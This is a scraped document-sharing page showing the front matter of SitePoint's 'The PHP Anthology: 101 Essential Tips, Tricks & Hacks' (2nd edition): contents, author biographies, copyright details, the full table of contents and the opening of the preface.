                 Zend_XmlRpc_Server class, 416, 419

      WSDL
                                     ZIP utility

        SOAP web services, 421, 424
              backing up databases, 71

                                                  creating files, 172–174

      X

      XDebug, 463

      XML, 395–412

        extensions, 396–398

More Related Content

PDF
Plesk Sitebuilder 4.5 for Linux/Unix Wizard User's Guide
PDF
Link building - Estratégias
PDF
Web Hosting Operations Guide
PDF
Monster list of 3,000 high quality back link source
PDF
Linux Vs Windows Tco Comparison
PDF
relexa hotel Guide - alle relexa hotels in einer Broschüre
PPT
Local retreat Sept 5-6
DOC
Indies take over the world 1
Plesk Sitebuilder 4.5 for Linux/Unix Wizard User's Guide
Link building - Estratégias
Web Hosting Operations Guide
Monster list of 3,000 high quality back link source
Linux Vs Windows Tco Comparison
relexa hotel Guide - alle relexa hotels in einer Broschüre
Local retreat Sept 5-6
Indies take over the world 1

Viewers also liked (7)

PDF
App it-forum-fyn-310113
PDF
Bunga rampai toa
PDF
Bluetec
PPTX
Normas de conducta
PPTX
Питьевая вода в Одессе. Факты, о которых вы узнаете первым
PPTX
Samin kesä 2010.
PPTX
Довольный клиент
App it-forum-fyn-310113
Bunga rampai toa
Bluetec
Normas de conducta
Питьевая вода в Одессе. Факты, о которых вы узнаете первым
Samin kesä 2010.
Довольный клиент
Ad

Similar to The PHP Anthology (20)

PDF
Beginning php 5 and my sql 5 from novice to professional
PDF
Categories
PDF
Class 7: Introduction to web technology entrepreneurship
PDF
DIPLOMA IN DESIGNING AND WEBSITE DEVELOPMENT
PPTX
Web Ninja
PPT
Webmaster
PPT
Webmaster
PDF
Php In A Nutshell A Desktop Quick Reference 1st Edition Paul Hudson
PDF
Class 6: Introduction to web technology entrepreneurship
PDF
Sap to php
PDF
resume
PDF
Thourough guid to PHP5
PPTX
Week 1
PDF
Wordpress Plugin Development Beginners Guide Vladimir Prelovac
PDF
SEO Freelance
PDF
Advanced php for web professionals
DOCX
resume
PDF
Web tech weblamp_infosession_2012-13
PDF
No Really, It's All About You
PDF
Don't Put Your WordPress Site at Risk
Beginning php 5 and my sql 5 from novice to professional
Categories
Class 7: Introduction to web technology entrepreneurship
DIPLOMA IN DESIGNING AND WEBSITE DEVELOPMENT
Web Ninja
Webmaster
Webmaster
Php In A Nutshell A Desktop Quick Reference 1st Edition Paul Hudson
Class 6: Introduction to web technology entrepreneurship
Sap to php
resume
Thourough guid to PHP5
Week 1
Wordpress Plugin Development Beginners Guide Vladimir Prelovac
SEO Freelance
Advanced php for web professionals
resume
Web tech weblamp_infosession_2012-13
No Really, It's All About You
Don't Put Your WordPress Site at Risk
Ad

Recently uploaded (20)

PDF
Trump Administration's workforce development strategy
PDF
1.3 FINAL REVISED K-10 PE and Health CG 2023 Grades 4-10 (1).pdf
PDF
Vision Prelims GS PYQ Analysis 2011-2022 www.upscpdf.com.pdf
PPTX
Share_Module_2_Power_conflict_and_negotiation.pptx
PPTX
Introduction to Building Materials
PDF
CISA (Certified Information Systems Auditor) Domain-Wise Summary.pdf
PDF
RTP_AR_KS1_Tutor's Guide_English [FOR REPRODUCTION].pdf
PDF
FORM 1 BIOLOGY MIND MAPS and their schemes
PDF
Chinmaya Tiranga quiz Grand Finale.pdf
PDF
Paper A Mock Exam 9_ Attempt review.pdf.
PDF
1_English_Language_Set_2.pdf probationary
PDF
احياء السادس العلمي - الفصل الثالث (التكاثر) منهج متميزين/كلية بغداد/موهوبين
PPTX
202450812 BayCHI UCSC-SV 20250812 v17.pptx
PDF
FOISHS ANNUAL IMPLEMENTATION PLAN 2025.pdf
PPTX
Unit 4 Computer Architecture Multicore Processor.pptx
PPTX
ELIAS-SEZIURE AND EPilepsy semmioan session.pptx
PPTX
20th Century Theater, Methods, History.pptx
PDF
medical_surgical_nursing_10th_edition_ignatavicius_TEST_BANK_pdf.pdf
PPTX
History, Philosophy and sociology of education (1).pptx
PDF
David L Page_DCI Research Study Journey_how Methodology can inform one's prac...
Trump Administration's workforce development strategy
1.3 FINAL REVISED K-10 PE and Health CG 2023 Grades 4-10 (1).pdf
Vision Prelims GS PYQ Analysis 2011-2022 www.upscpdf.com.pdf
Share_Module_2_Power_conflict_and_negotiation.pptx
Introduction to Building Materials
CISA (Certified Information Systems Auditor) Domain-Wise Summary.pdf
RTP_AR_KS1_Tutor's Guide_English [FOR REPRODUCTION].pdf
FORM 1 BIOLOGY MIND MAPS and their schemes
Chinmaya Tiranga quiz Grand Finale.pdf
Paper A Mock Exam 9_ Attempt review.pdf.
1_English_Language_Set_2.pdf probationary
احياء السادس العلمي - الفصل الثالث (التكاثر) منهج متميزين/كلية بغداد/موهوبين
202450812 BayCHI UCSC-SV 20250812 v17.pptx
FOISHS ANNUAL IMPLEMENTATION PLAN 2025.pdf
Unit 4 Computer Architecture Multicore Processor.pptx
ELIAS-SEZIURE AND EPilepsy semmioan session.pptx
20th Century Theater, Methods, History.pptx
medical_surgical_nursing_10th_edition_ignatavicius_TEST_BANK_pdf.pdf
History, Philosophy and sociology of education (1).pptx
David L Page_DCI Research Study Journey_how Methodology can inform one's prac...

The PHP Anthology

  • 2. Summary of Contents Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xv 1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 2. Using Databases with PDO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39 3. Strings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77 4. Dates and Times . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95 5. Forms, Tables, and Pretty URLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115 6. Working with Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147 7. Email . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179 8. Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 197 9. Error Handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 237 10. Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 269 11. Caching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363 12. XML and Web Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 395 13. Best Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435 A. PHP Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473 B. Hosting Provider Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483 C. Security Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 489 D. Working with PEAR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497 Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 505
  • 3. THE PHP ANTHOLOGY 101 ESSENTIAL TIPS, TRICKS & HACKS BY DAVEY SHAFIK MATTHEW WEIER O’PHINNEY LIGAYA TURMELLE HARRY FUECKS BEN BALBO 2ND EDITION
  • 4. iv The PHP Anthology: 101 Essential Tips, Tricks & Hacks by Davey Shafik, Matthew Weier O’Phinney, Ligaya Turmelle, Harry Fuecks, and Ben Balbo Copyright © 2007 SitePoint Pty. Ltd. Expert Reviewer: Jason Sweat Editor: Georgina Laidlaw Managing Editor: Simon Mackie Editor: Hilary Reynolds Technical Editor: Andrew Tetlaw Index Editor: Fred Brown Technical Director: Kevin Yank Cover Design: Alex Walker Printing History: First Edition: December, 2003 Second Edition: October, 2007 Notice of Rights All rights reserved. No part of this book may be reproduced, stored in a retrieval system or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews. Notice of Liability The author and publisher have made every effort to ensure the accuracy of the information herein. However, the information contained in this book is sold without warranty, either express or implied. Neither the authors and SitePoint Pty. Ltd., nor its dealers or distributors will be held liable for any damages to be caused either directly or indirectly by the instructions contained in this book, or by the software or hardware products described herein. Trademark Notice Rather than indicating every occurrence of a trademarked name as such, this book uses the names only in an editorial fashion and to the benefit of the trademark owner with no intention of infringement of the trademark. Published by SitePoint Pty. Ltd. 424 Smith Street Collingwood VIC Australia 3066 Web: www.sitepoint.com Email: business@sitepoint.com ISBN 978-0-9758419-9-0 Printed and bound in the United States of America
  • 5. v Ben Balbo Ben Balbo was born in Germany, grew up in the UK, lives in Melbourne, and likes Guinness. While he isn’t drinking Guinness (which is most of the time in Melbourne, as it just doesn’t taste the same), he earns a living as a PHP developer and trainer, security consultant, and Open Source developer. He has been known to talk in public about web development-related topics, which comes as part of the package of being on the committees of both the Melbourne PHP User Group and Open Source Developers’ Club. Although he wouldn’t admit this, he participates at this level only in order to go to restaurants or pubs after the meetings. Harry Fuecks Harry Fuecks1 is a technical writer, programmer, and system engineer. He has worked in corporate IT since 1994, having completed a Bachelor’s degree in Physics. He first came across PHP in 1999, while putting together a small intranet. Today, he’s the lead developer of a corporate extranet, where PHP plays an important role in delivering a unified platform for numerous back office systems. In his off hours he writes technical articles for SitePoint and runs phpPatterns,2 a site exploring PHP application design. Originally from the United Kingdom, he now lives in Switzerland. Harry is the proud father of a beautiful baby girl who keeps him busy all day (and night!). Davey Shafik Davey Shafik is a full-time PHP developer with ten years’ experience in PHP and related technologies. An avid magazine writer, book author, and speaker, Davey keeps his mind sharp by trying to tackle problems from a unique perspective from his home in Central Florida where he lives with five cats and more computers. Ligaya Turmelle Ligaya Turmelle is a full-time goddess, occasional PHP programmer, and obsessive world traveler. Actively involved with the PHP community as a founding Principal of phpwomen.org, administrator at codewalkers.com, roving reporter for the Developer Zone on Zend.com, and PHP blogger and long-time busybody of #phpc on freenode, she hopes to one day actually meet the people she talks to. When not sitting at her computer staring at the screen, Ligaya can usually be found either playing golf, scuba diving, snorkeling, kayaking, hiking, or just playing with the dogs outside. Ligaya Turmelle is a Zend Certified Engineer. 1 Harry Fuecks photo credit: Bruno Gerber http://www.flickr.com/photos/beegee74/231137320/ 2 http://www.phppatterns.com/
  • 6. vi Matthew Weier O’Phinney Matthew Weier O’Phinney is a full-time father of two and spends his free time developing in PHP. He is a PEAR developer, core contributor to Zend Framework, and all-around PHP 5 proponent—though PHP 6 cannot come soon enough for him. About the Expert Reviewer Jason Sweat has used PHP since 2001, where he was searching for a free—as in beer—substi­ tute for IIS/ASP to create an accounting system for a home business. His Unix administrator pointed him towards Linux, Apache, and PHP. He has since adopted PHP as an intranet de­ velopment standard at work, as well as using PHP in a Unix shell scripting environment. He is the author of php|architect's Guide to PHP Design Patterns (Toronto: Marco Tabini & As­ sociates, 2005), and was a co-author of PHP Graphics Handbook (Birmingham: Wrox 2003), has published several articles for the Zend web site and for php|architect magazine, and has presented numerous talks on PHP at various conferences. Jason is a Zend Certified Engineer, and maintains a blog at http://blog.casey-sweat.us/. About the Technical Editor Andrew Tetlaw has been tinkering with web sites as a web developer since 1997 and has also worked as a high school English teacher, an English teacher in Japan, a window cleaner, a car washer, a kitchen hand, and a furniture salesman. At SitePoint he is dedicated to making the world a better place through the technical editing of SitePoint books and kits. He is also a busy father of five, enjoys coffee, and often neglects his blog at http://tetlaw.id.au/. About the Technical Director As Technical Director for SitePoint, Kevin Yank oversees all of its technical publica­ tions—books, articles, newsletters, and blogs. He has written over 50 articles for SitePoint, but is best known for his book, Build Your Own Database Driven Website Using PHP & MySQL. Kevin lives in Melbourne, Australia, and enjoys performing improvised comedy theatre and flying light aircraft. About SitePoint SitePoint specializes in publishing fun, practical, and easy-to-understand content for web professionals. Visit http://www.sitepoint.com/ to access our books, newsletters, articles, and community forums.
  • 7. Table of Contents Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xv Who Should Read this Book? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvi What’s Covered in this Book? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii Running the Code Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xix The Book’s Web Site . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xx The SitePoint Forums . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi The SitePoint Newsletters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi Your Feedback . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi Conventions Used in this Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi Chapter 1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Where do I get help? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 What is OOP? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 How do I write portable PHP code? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38 Chapter 2 Using Databases with PDO . . . . . . . . . . . 39 What is PDO? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40 How do I access a database? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41 How do I fetch data from a table? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44 How do I resolve errors in my SQL queries? . . . . . . . . . . . . . . . . . . . . . . . . 49 How do I add data to, or modify data in, my database? . . . . . . . . . . . . . 53 How do I protect my web site from an SQL injection attack? . . . . . . . . . 55 How do I create flexible SQL statements? . . . . . . . . . . . . . . . . . . . . . . . . . 57 How do I find out how many rows I’ve touched? . . . . . . . . . . . . . . . . . . . 59
  • 8. viii How do I find out a new INSERT’s row number in an autoincrementing field? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62 How do I search my table? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 How do I work with transactions? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 How do I use stored procedures with PDO? . . . . . . . . . . . . . . . . . . . . . . . . 67 How do I back up my database? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75 Chapter 3 Strings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77 How do I output strings safely? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 How do I preserve formatting? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81 How do I strip HTML tags from text? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82 How do I force text to wrap after a certain number of characters? . . . . 84 How do I perform advanced search and replace operations? . . . . . . . . . 84 How do I break up text into an array of lines? . . . . . . . . . . . . . . . . . . . . . 86 How do I trim whitespace from text? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 How do I output formatted text? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 How do I validate submitted data? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94 Chapter 4 Dates and Times . . . . . . . . . . . . . . . . . . . . . . . . . . 95 How do I use Unix timestamps? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96 How do I obtain the current date? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98 How do I find a day of the week? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101 How do I find the number of days in a month? . . . . . . . . . . . . . . . . . . . 101 How do I create a calendar? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102 How do I store dates in MySQL? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107 How do I format MySQL timestamps? . . . . . . . . . . . . . . . . . . . . . . . . . . . 109 How do I perform date calculations using MySQL? . . . . . . . . . . . . . . . . 111 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
  • 9. ix Chapter 5 Forms, Tables, and Pretty URLs . . . 115 How do I build HTML forms with PHP? . . . . . . . . . . . . . . . . . . . . . . . . . . 116 How do I display data in a table? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127 How do I display data in a sortable table? . . . . . . . . . . . . . . . . . . . . . . . . 130 How do I create a customized data grid? . . . . . . . . . . . . . . . . . . . . . . . . 134 How do I make “pretty” URLs in PHP? . . . . . . . . . . . . . . . . . . . . . . . . . . . 139 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145 Chapter 6 Working with Files . . . . . . . . . . . . . . . . . . . . . 147 How do I read a local file? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148 How do I use file handles? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153 How do I modify a local file? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155 How do I access information about a local file? . . . . . . . . . . . . . . . . . . . 157 How do I examine directories with PHP? . . . . . . . . . . . . . . . . . . . . . . . . . 160 How do I display PHP source code online? . . . . . . . . . . . . . . . . . . . . . . . 161 How do I store configuration information in a file? . . . . . . . . . . . . . . . 163 How do I access a file on a remote server? . . . . . . . . . . . . . . . . . . . . . . . 166 How do I use FTP from PHP? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167 How do I manage file downloads with PHP? . . . . . . . . . . . . . . . . . . . . . . 170 How do I create compressed ZIP/TAR files with PHP? . . . . . . . . . . . . . . 172 How do I work with files using the Standard PHP Library in PHP 5? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177 Chapter 7 Email . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179 How do I send a simple email? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179 How do I simplify the generation of complex emails? . . . . . . . . . . . . . . 182 How do I add attachments to messages? . . . . . . . . . . . . . . . . . . . . . . . . . 184 How do I send HTML email? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
  • 10. x How do I mail a message to a group of people? . . . . . . . . . . . . . . . . . . . 188 How do I handle incoming mail with PHP? . . . . . . . . . . . . . . . . . . . . . . . 191 How can I protect my site against email injection attacks? . . . . . . . . . 193 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195 Chapter 8 Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 197 How do I specify the correct image MIME type? . . . . . . . . . . . . . . . . . . 198 How do I create thumbnail images? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 199 How do I resize images without stretching them? . . . . . . . . . . . . . . . . . 202 How can I put together a simple thumbnail gallery? . . . . . . . . . . . . . . . 214 How do I extract EXIF information from images? . . . . . . . . . . . . . . . . . . 217 How do I add a watermark to an image? . . . . . . . . . . . . . . . . . . . . . . . . . 220 How do I display charts and graphs with PHP? . . . . . . . . . . . . . . . . . . . . 223 How do I prevent the hotlinking of images? . . . . . . . . . . . . . . . . . . . . . . 230 How do I create images that can be verified by humans only? . . . . . . . 234 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235 Chapter 9 Error Handling . . . . . . . . . . . . . . . . . . . . . . . . . . 237 What error levels does PHP report? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238 What built-in settings does PHP offer for error handling? . . . . . . . . . . 239 How can I trigger PHP errors? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241 How do I implement a custom error handler with PHP? . . . . . . . . . . . . 242 How do I log and report errors? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247 How can I use PHP exceptions for error handling? . . . . . . . . . . . . . . . . 248 How do I create a custom Exception class? . . . . . . . . . . . . . . . . . . . . . 252 How do I implement a custom exception handler with PHP? . . . . . . . . 257 How can I handle PHP errors as if they were exceptions? . . . . . . . . . . . 260 How do I display errors and exceptions gracefully? . . . . . . . . . . . . . . . . 261 How do I redirect users to another page following an error condition? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 265
  • 11. xi Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267 Chapter 10 Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . 269 How do I use HTTP authentication? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271 How do I use sessions? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277 How do I create a session class? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281 How do I create a class to control access to a section of the site? . . . . 283 How do I build a registration system? . . . . . . . . . . . . . . . . . . . . . . . . . . . 297 How do I deal with members who forget their passwords? . . . . . . . . . . 318 How do I let users change their passwords? . . . . . . . . . . . . . . . . . . . . . . 330 How to do I build a permissions system? . . . . . . . . . . . . . . . . . . . . . . . . . 339 How do I store sessions in a database? . . . . . . . . . . . . . . . . . . . . . . . . . . 353 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362 Chapter 11 Caching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363 How do I prevent web browsers from caching a page? . . . . . . . . . . . . . 365 How do I control client-side caching? . . . . . . . . . . . . . . . . . . . . . . . . . . . 367 How do I examine HTTP headers in my browser? . . . . . . . . . . . . . . . . . . 371 How do I cache file downloads with Internet Explorer? . . . . . . . . . . . . 372 How do I use output buffering for server-side caching? . . . . . . . . . . . . 373 How do I cache just the parts of a page that change infrequently? . . 377 How do I use PEAR::Cache_Lite for server-side caching? . . . . . . . . . . . 382 What configuration options does Cache_Lite support? . . . . . . . . . . 385 How do I purge the Cache_Lite cache? . . . . . . . . . . . . . . . . . . . . . . . . 389 How do I cache function calls? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 392 Chapter 12 XML and Web Services . . . . . . . . . . . . . . . 395 Which XML technologies are available in PHP 5? . . . . . . . . . . . . . . . . . . 396
  • 12. xii Why should I use PHP’s XML extensions instead of PHP string functions? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396 How do I parse an RSS feed? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398 How do I generate an RSS feed? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405 How do I search for a node or content in XML? . . . . . . . . . . . . . . . . . . . 409 How can I consume XML-RPC web services? . . . . . . . . . . . . . . . . . . . . . . 412 How do I serve my own XML-RPC web services? . . . . . . . . . . . . . . . . . . 416 How can I consume SOAP web services? . . . . . . . . . . . . . . . . . . . . . . . . . 420 How do I serve SOAP web services? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423 How can I consume REST services? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 425 How can I serve REST services? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433 Chapter 13 Best Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435 How do I track revisions to my project’s code? . . . . . . . . . . . . . . . . . . . . 436 How can I maintain multiple versions of a single codebase? . . . . . . . . 438 How can I write distributable code? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441 How can I document my code for later reference by myself or others? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448 How can I ensure future changes to my code won’t break current functionality? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 454 How can I determine what remains to be tested? . . . . . . . . . . . . . . . . . 463 I’ve reviewed some of my old code, and it’s horrible. How can I make it better? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 467 How can I deploy code safely? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471 Appendix A PHP Configuration . . . . . . . . . . . . . . . . . . . . . 473 Configuration Mechanisms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473 Key Security and Portability Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
  • 13. xiii Includes and Execution Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475 Error-related Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 480 Miscellaneous Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 481 Appendix B Hosting Provider Checklist . . . . . . . . . . 483 General Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483 PHP-related Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 485 Appendix C Security Checklist . . . . . . . . . . . . . . . . . . . . . . 489 Top Security Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 489 Appendix D Working with PEAR . . . . . . . . . . . . . . . . . . . 497 Installing PEAR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 498 The PEAR Package Manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501 Installing Packages Manually . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 503 Alternatives to PEAR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 504 Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 505
  • 15. Preface One of the great things about PHP is its vibrant and active community. Developers enjoy many online meeting points, including the SitePoint Forums,1 where de­ velopers get together to help each other out with problems they face on a daily basis, from the basics of how PHP works, to solving design problems like “How do I val­ idate a form?” As a way to get help, these communities are excellent—they’re replete with all sorts of vital fragments you’ll need to make your projects successful. But putting all that knowledge together into a solution that applies to your particular situation can be a challenge. Often, community members assume other posters have some degree of knowledge; frequently, you might spend a considerable amount of time pulling together snippets from various posts, threads, and users (each of whom has a different programming style) to gain a complete picture. The PHP Anthology: 101 Essential Tips, Tricks & Hacks, 2nd Edition is, first and foremost, a compilation of the best solutions provided to common PHP questions that turn up at the SitePoint Forums on a regular basis, combined with the experi­ ences and insights our authors have gained from their many years of work with PHP. What makes this book a little different from others on PHP is that it steps away from a tutorial style, and instead focuses on the achievement of practical goals with a minimum of effort. To that extent, you should be able to use many of the solutions provided here in a plug-and-play manner, without having to read this book from cover to cover. To aid you in your endeavours, each section follows a consistent question-and-solution format. You should be able to scan the table of contents and flip straight to the solution to your problem. That said, threaded throughout these discussions is a hidden agenda. As well as solutions, this book aims to introduce you to techniques that can save you effort, and help you reduce the time it takes to complete and maintain your web-based PHP applications. Although it was originally conceived as a procedural programming language, in recent years PHP has proven increasingly successful as a language for the develop­ 1 http://www.sitepoint.com/forums/forumdisplay.php?f=34
  • 16. xvi ment of object oriented solutions. With the release of PHP 5, PHP gained a completely rewritten and more capable object model. This has been further reinforced by the fact that on July 13, 2007 the PHP development team made the end-of-life announce­ ment for PHP 4. The object oriented paradigm seems to scare many PHP developers, and is often regarded as being off limits to all but the PHP gurus. What this book will show you is that you don’t need a computer science degree to take advantage of the object oriented features and class libraries available in PHP 5 today. The PHP Extension and Application Repository, known as PEAR,2 provides a growing collection of reusable and well-maintained solutions for architectural problems (such as web form generation and validation) regularly encountered by PHP developers around the world. Wherever possible in the development of the solutions provided in this book, we’ve made use of freely available libraries that our authors have personally found handy, and which have saved them many hours of development. The emphasis this book places on taking advantage of reusable components to build your PHP web applications reflects another step away from the focus of many current PHP-related books. Although you won’t find extensive discussions of object oriented application design, reading The PHP Anthology: 101 Essential Tips, Tricks & Hacks, 2nd Edition from cover to cover will, through a process of osmosis, help you take your PHP coding skills to the next level, setting you well on your way to constructing applications that can stand the test of time. The PHP Anthology: 101 Essential Tips, Tricks & Hacks, 2nd Edition will equip you with the essentials with which you need to be confident when working the PHP engine, including a fast-paced primer on object oriented programming with PHP (see “What is OOP?” in Chapter 1). With that preparation out of the way, the book looks at solutions that could be applied to almost all PHP-based web applica­ tions, the essentials of which you may already know, but have yet to fully grasp. Who Should Read this Book? If you’ve already gotten your feet wet with PHP, perhaps having read Kevin Yank’s Build Your Own Database Driven Website Using PHP & MySQL, 3rd Edition (Site­ 2 http://pear.php.net/
